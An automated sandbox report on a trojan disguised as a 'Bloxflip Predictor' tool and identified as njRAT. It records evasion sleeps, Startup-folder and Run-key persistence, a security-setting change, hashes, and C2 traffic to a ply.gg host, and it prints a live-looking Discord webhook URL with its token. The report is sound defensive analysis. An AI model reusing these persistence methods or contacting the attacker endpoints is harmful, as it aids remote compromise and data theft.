          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe; Memory allocated: 54A0000 memory commit | memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exe; Thread delayed: delay time: 922337203685477
          Source: C:\Windows\Bloxflip Predictor.exe; Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe; Thread delayed: delay time: 922337203685477
          Source: C:\Windows\Bloxflip Predictor.exe; Window / User API: threadDelayed 2686
          Source: C:\Windows\Bloxflip Predictor.exe; Window / User API: threadDelayed 7299
          Source: C:\Windows\Bloxflip Predictor.exe; Window / User API: foregroundWindowGot 1774
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exe TID: 2624; Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\Bloxflip Predictor.exe TID: 6588; Thread sleep count: 2686 > 30
          Source: C:\Windows\Bloxflip Predictor.exe TID: 6588; Thread sleep time: -2686000s >= -30000s
          Source: C:\Windows\Bloxflip Predictor.exe TID: 6588; Thread sleep count: 7299 > 30
          Source: C:\Windows\Bloxflip Predictor.exe TID: 6588; Thread sleep time: -7299000s >= -30000s
          Source: C:\Windows\Bloxflip Predictor.exe TID: 1292; Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe TID: 6728; Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exe; File opened: C:\Users\user
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exe; File opened: C:\Users\user\AppData\Roaming
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exe; File opened: C:\Users\user\AppData
          Source: Bloxflip Predictor.exe, 0000000A.00000002.2393717586.00000000014C6000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Windows.exe, 0000000C.00000002.2880044538.00000000016A5000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\,
          Source: Bloxflip Predictor.exe, 00000002.00000002.4504825162.00000000013A7000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Windows\Bloxflip Predictor.exe; Process token adjusted: Debug
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exe; Memory allocated: page read and write | page guard
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exe; Process created: C:\Windows\Bloxflip Predictor.exe "C:\Windows\Bloxflip Predictor.exe"
          Source: Bloxflip Predictor.exe, 00000002.00000002.4505594179.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Bloxflip Predictor.exe, 00000002.00000002.4505594179.000000000377E000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Program Manager
          Source: Bloxflip Predictor.exe, 00000002.00000002.4505594179.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Bloxflip Predictor.exe, 00000002.00000002.4505594179.000000000377E000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Program Manager@9
          Source: C:\Windows\Bloxflip Predictor.exe; Queries volume information: C:\ VolumeInformation

          Lowering of HIPS / PFW / Operating System Security Settings

          Source: C:\Windows\Bloxflip Predictor.exe; Registry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKS

          Stealing of Sensitive Information

          Source: Yara match; File source: Bloxflip Predictor.exe, type: SAMPLE
          Source: Yara match; File source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara match; File source: 00000001.00000002.2145141321.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: Process Memory Space: Bloxflip Predictor.exe PID: 5504, type: MEMORYSTR
          Source: Yara match; File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPED
          Source: Yara match; File source: C:\Windows\Bloxflip Predictor.exe, type: DROPPED

          Remote Access Functionality

          Source: Yara match; File source: Bloxflip Predictor.exe, type: SAMPLE
          Source: Yara match; File source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara match; File source: 00000001.00000002.2145141321.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: Process Memory Space: Bloxflip Predictor.exe PID: 5504, type: MEMORYSTR
          Source: Yara match; File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPED
          Source: Yara match; File source: C:\Windows\Bloxflip Predictor.exe, type: DROPPED

          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Command and Scripting Interpreter | 321 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 121 Masquerading | OS Credential Dumping | 11 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
          Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 12 Process Injection | 11 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
          Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 321 Registry Run Keys / Startup Folder | 31 Virtualization/Sandbox Evasion | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 1 Access Token Manipulation | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Process Injection | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | 4 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | 11 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery

          [Behavior graph. ID: 1574576; Sample: Bloxflip Predictor.exe; Startdate: 13/12/2024; Architecture: WINDOWS; Score: 100]

          Source | Detection | Scanner | Label | Link
          Bloxflip Predictor.exe | 84% | ReversingLabs | ByteCode-MSIL.Backdoor.njRAT |
          Bloxflip Predictor.exe | 100% | Avira | TR/Dropper.Gen7 |
          Bloxflip Predictor.exe | 100% | Joe Sandbox ML | |

          Source | Detection | Scanner | Label | Link
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe | 100% | Avira | TR/Dropper.Gen7 |
          C:\Windows\Bloxflip Predictor.exe | 100% | Avira | TR/Dropper.Gen7 |
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe | 100% | Joe Sandbox ML | |
          C:\Windows\Bloxflip Predictor.exe | 100% | Joe Sandbox ML | |
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe | 84% | ReversingLabs | ByteCode-MSIL.Backdoor.njRAT |
          C:\Windows\Bloxflip Predictor.exe | 84% | ReversingLabs | ByteCode-MSIL.Backdoor.njRAT |

          No Antivirus matches
          No Antivirus matches

          Source | Detection | Scanner | Label | Link
          https://gg.ylp.ta.sc-etiuq | 0% | Avira URL Cloud | safe |

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          discord.com | 162.159.137.232 | true | false | | high
          quite-cs.at.ply.gg | 147.185.221.224 | true | true | | unknown

          Name | Malicious | Antivirus Detection | Reputation
          https://discord.com/api/webhooks/1040048109578895410/ewZ0edyfPb3PSo10z3bgM05aZex7uX3D_NzU6Fq1aA_P8lZYDHIuWHv2Qzzn-JTgsdIp | false | | high

          Name | Source | Malicious | Antivirus Detection | Reputation
          https://discord.com/api/webhooks/1040048109578895410/ewZ0edyfPb3PSo10z3bgM05aZex7uX3D_NzU6Fq1aA_P8lZ | Bloxflip Predictor.exe, Windows.exe.2.dr, Bloxflip Predictor.exe.1.dr | false | | high
          https://gg.ylp.ta.sc-etiuq | Bloxflip Predictor.exe, Windows.exe.2.dr, Bloxflip Predictor.exe.1.dr | false | Avira URL Cloud: safe | unknown

          IP | Domain | Country | Flag | ASN | ASN Name | Malicious
          162.159.137.232 | discord.com | United States | | 13335 | CLOUDFLARENETUS | false
          147.185.221.224 | quite-cs.at.ply.gg | United States | | 12087 | SALSGIVERUS | true

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1574576
                  Start date and time:2024-12-13 12:30:38 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 7m 45s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:13
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:Bloxflip Predictor.exe
                  Detection:MAL
                  Classification:mal100.phis.troj.adwa.evad.winEXE@14/6@2/2
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 216
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                  • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • VT rate limit hit for: Bloxflip Predictor.exe

          Time | Type | Description
          06:32:21 | API Interceptor | 445047x Sleep call for process: Bloxflip Predictor.exe modified
          12:31:33 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk
          12:31:46 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows2 C:\Windows\Bloxflip Predictor.exe
          12:31:54 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Windows.URL
          12:32:03 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Windows2 C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Windows.URL
          12:32:11 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Windows C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Windows.URL
          12:32:19 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows2 C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Windows.URL
          12:32:27 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Windows.URL
          12:32:35 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe

                                          Process:C:\Users\user\Desktop\Bloxflip Predictor.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):525
                                          Entropy (8bit):5.259753436570609
                                          Encrypted:false
                                          SSDEEP:12:Q3LaJU2C9XAn10Ug+9pfu9t0U29xtUz1B0U2uk71K6xhk7v:MLF2CpI3zffup29Iz52Ve
                                          MD5:260E01CC001F9C4643CA7A62F395D747
                                          SHA1:492AD0ACE3A9C8736909866EEA168962D418BE5A
                                          SHA-256:4BC52CCF866F489772A6919A0CC2C55B1432729D6BDF29E17E5853ABDFAB6030
                                          SHA-512:01AF7D75257E3DBD460E328F5C057D0367B83D3D9397E89CA3AE54AB9B2842D62352D8CCB4BE98ACE0C5667846759D32C199DE39ECCD0CF9CD6A83267D27E7C4
                                          Malicious:true
                                          Reputation:moderate, very likely benign file
                                          Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\bec14584c93014efbc76285c35d1e891\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\7d443c6c007fe8696f9aa6ff1da53ef7\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\2cdaeaf53e3d49038cf7cb0ce9d805d3\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\d0e5535854cce87ea7f2d69d0594b7a8\System.Windows.Forms.ni.dll",0..
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):525
                                          Entropy (8bit):5.259753436570609
                                          Encrypted:false
                                          SSDEEP:12:Q3LaJU2C9XAn10Ug+9pfu9t0U29xtUz1B0U2uk71K6xhk7v:MLF2CpI3zffup29Iz52Ve
                                          MD5:260E01CC001F9C4643CA7A62F395D747
                                          SHA1:492AD0ACE3A9C8736909866EEA168962D418BE5A
                                          SHA-256:4BC52CCF866F489772A6919A0CC2C55B1432729D6BDF29E17E5853ABDFAB6030
                                          SHA-512:01AF7D75257E3DBD460E328F5C057D0367B83D3D9397E89CA3AE54AB9B2842D62352D8CCB4BE98ACE0C5667846759D32C199DE39ECCD0CF9CD6A83267D27E7C4
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\bec14584c93014efbc76285c35d1e891\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\7d443c6c007fe8696f9aa6ff1da53ef7\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\2cdaeaf53e3d49038cf7cb0ce9d805d3\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\d0e5535854cce87ea7f2d69d0594b7a8\System.Windows.Forms.ni.dll",0..
                                          Process:C:\Windows\Bloxflip Predictor.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):28160
                                          Entropy (8bit):5.537645975163793
                                          Encrypted:false
                                          SSDEEP:384:rLptwff1tqGIOfIBTkqS61bPGdrNM1AQk93vmhm7UMKmIEecKdbXTzm9bVhcar6v:/pqffy3LN1A/vMHTi9bD
                                          MD5:7BF897CA59B77AD3069C07149C35F97E
                                          SHA1:6951DC20FA1E550EC9D066FE20E5100A9946A56B
                                          SHA-256:BC37B896FEE26A5B4DE7845CDD046E0200C783D4907FFA7E16DA84ED6B5987DD
                                          SHA-512:6E0725043262EEC328130883B8C6A413C03FA11E766DB44E6E2595DFA5D3E13D02B7A199105CAD8439C66238CF2975099D40B33CDAEB4768DA159060B6F35DAF
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, Author: Joe Security
                                          • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, Author: unknown
                                          • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, Author: Florian Roth
                                          • Rule: Njrat, Description: detect njRAT in memory, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, Author: JPCERT/CC Incident Response Group
                                          • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, Author: ditekSHen
                                          • Rule: INDICATOR_SUSPICIOUS_EXE_attrib, Description: Detects executables using attrib with suspicious attributes attributes, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, Author: ditekSHen
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 84%
                                          Process:C:\Users\user\Desktop\Bloxflip Predictor.exe
                                          File Type:MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                          Category:dropped
                                          Size (bytes):1238
                                          Entropy (8bit):2.9005324467960167
                                          Encrypted:false
                                          SSDEEP:24:8gvWLgD4/BOmRC87q8MHBJrXE+16d0+qy:8pgDsvRC87tMhJrRhy
                                          MD5:A1D982C1F47A41AE13C580A79166C9A8
                                          SHA1:D208B7CCB1761D32579350BA827F1C677E65A765
                                          SHA-256:2881695075D4DCE03AF905B41122BDB3DFEB95EDA6404F53BF035E943818064D
                                          SHA-512:5F0F455C1472AAC57DC2192702EFB1752A21A2695F0F230281671F6EDBA8025C8B0AB098F8292E374468B770F2FB1BB2D923FE5CCEF12CE9B427C60F7840DA09
                                          Malicious:false
                                          Process:C:\Users\user\Desktop\Bloxflip Predictor.exe
                                          File Type:MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                          Category:dropped
                                          Size (bytes):1058
                                          Entropy (8bit):2.9364199742996298
                                          Encrypted:false
                                          SSDEEP:12:8gl0csXU1e/tz0/CSLwrHj4/3BVwzyDilVBJrXE+1gCNfBf4t2YZ/elFlSJm:87vWLgD4/BUBJrXE+1pjqy
                                          MD5:927D6613C523813127CF1E54134796A7
                                          SHA1:FF7DB76489FE1177019DD219C1EA466BE3462970
                                          SHA-256:BB3CCDA0AAC133870D311CB526B924177ABBA4179D1FD30C0A29D991CBD14DFC
                                          SHA-512:6A2E3839F16E46D8B5DCB95C5782A7DC6FCC3895FDCEFA8D42902F1F736F31C34AE31EA1CA77DD067E323B4263CCEAD9CF44D3864FF0E08BB22606228022858C
                                          Malicious:false
                                          Process:C:\Users\user\Desktop\Bloxflip Predictor.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):28160
                                          Entropy (8bit):5.537645975163793
                                          Encrypted:false
                                          SSDEEP:384:rLptwff1tqGIOfIBTkqS61bPGdrNM1AQk93vmhm7UMKmIEecKdbXTzm9bVhcar6v:/pqffy3LN1A/vMHTi9bD
                                          MD5:7BF897CA59B77AD3069C07149C35F97E
                                          SHA1:6951DC20FA1E550EC9D066FE20E5100A9946A56B
                                          SHA-256:BC37B896FEE26A5B4DE7845CDD046E0200C783D4907FFA7E16DA84ED6B5987DD
                                          SHA-512:6E0725043262EEC328130883B8C6A413C03FA11E766DB44E6E2595DFA5D3E13D02B7A199105CAD8439C66238CF2975099D40B33CDAEB4768DA159060B6F35DAF
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Windows\Bloxflip Predictor.exe, Author: Joe Security
                                          • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: C:\Windows\Bloxflip Predictor.exe, Author: unknown
                                          • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: C:\Windows\Bloxflip Predictor.exe, Author: Florian Roth
                                          • Rule: Njrat, Description: detect njRAT in memory, Source: C:\Windows\Bloxflip Predictor.exe, Author: JPCERT/CC Incident Response Group
                                          • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Windows\Bloxflip Predictor.exe, Author: ditekSHen
                                          • Rule: INDICATOR_SUSPICIOUS_EXE_attrib, Description: Detects executables using attrib with suspicious attributes attributes, Source: C:\Windows\Bloxflip Predictor.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: C:\Windows\Bloxflip Predictor.exe, Author: ditekSHen
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 84%
                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):5.537645975163793
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Windows Screen Saver (13104/52) 0.07%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          File name:Bloxflip Predictor.exe
                                          File size:28'160 bytes
                                          MD5:7bf897ca59b77ad3069c07149c35f97e
                                          SHA1:6951dc20fa1e550ec9d066fe20e5100a9946a56b
                                          SHA256:bc37b896fee26a5b4de7845cdd046e0200c783d4907ffa7e16da84ed6b5987dd
                                          SHA512:6e0725043262eec328130883b8c6a413c03fa11e766db44e6e2595dfa5d3e13d02b7a199105cad8439c66238cf2975099d40b33cdaeb4768da159060b6f35daf
                                          SSDEEP:384:rLptwff1tqGIOfIBTkqS61bPGdrNM1AQk93vmhm7UMKmIEecKdbXTzm9bVhcar6v:/pqffy3LN1A/vMHTi9bD
                                          TLSH:09C2F82C37B68232D1EF467E4662EA5142B5D44BF223FB0E4CD958D94B1B78A0A41FE4
                                          Icon Hash:00928e8e8686b000
                                          Entrypoint:0x40842e
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x636DAC2A [Fri Nov 11 01:58:02 2022 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          Name | Virtual Address | Virtual Size | Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x83d4 | 0x57 | .text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa000 | 0x240 | .rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc000 | 0xc | .reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                          .text | 0x2000 | 0x6434 | 0x6600 | b43ce1e9ab64a13e9f40b7497d9c743f | False | 0.4690946691176471 | data | 5.580560397703258 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc | 0xa000 | 0x240 | 0x400 | 5b346ed223699f15252c1fdad182859f | False | 0.3134765625 | data | 4.968771659524424 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc | 0xc000 | 0xc | 0x200 | 1073501db1737ec78fc9e639b9e87dac | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                          Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                          RT_MANIFEST | 0xa058 | 0x1e7 | XML 1.0 document, ASCII text, with CRLF line terminators | | | 0.5338809034907598
                                          DLL | Import
                                          mscoree.dll | _CorExeMain
                                          Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                          2024-12-13T12:31:56.140063+0100 | 2033132 | ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) | 1 | 192.168.2.5 | 49726 | 147.185.221.224 | 10397 | TCP
                                          2024-12-13T12:31:56.140063+0100 | 2021176 | ET MALWARE Bladabindi/njRAT CnC Command (ll) | 1 | 192.168.2.5 | 49726 | 147.185.221.224 | 10397 | TCP
                                          2024-12-13T12:31:56.262752+0100 | 2825563 | ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (inf) | 1 | 192.168.2.5 | 49726 | 147.185.221.224 | 10397 | TCP
                                          2024-12-13T12:31:56.262752+0100 | 2838486 | ETPRO MALWARE njRAT/Bladabindi Variant CnC Activity (inf) | 1 | 192.168.2.5 | 49726 | 147.185.221.224 | 10397 | TCP
                                          2024-12-13T12:32:02.247114+0100 | 2825564 | ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) | 1 | 192.168.2.5 | 49726 | 147.185.221.224 | 10397 | TCP
                                          2024-12-13T12:32:20.152010+0100 | 2033132 | ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) | 1 | 192.168.2.5 | 49777 | 147.185.221.224 | 10397 | TCP
                                          2024-12-13T12:32:20.152010+0100 | 2021176 | ET MALWARE Bladabindi/njRAT CnC Command (ll) | 1 | 192.168.2.5 | 49777 | 147.185.221.224 | 10397 | TCP
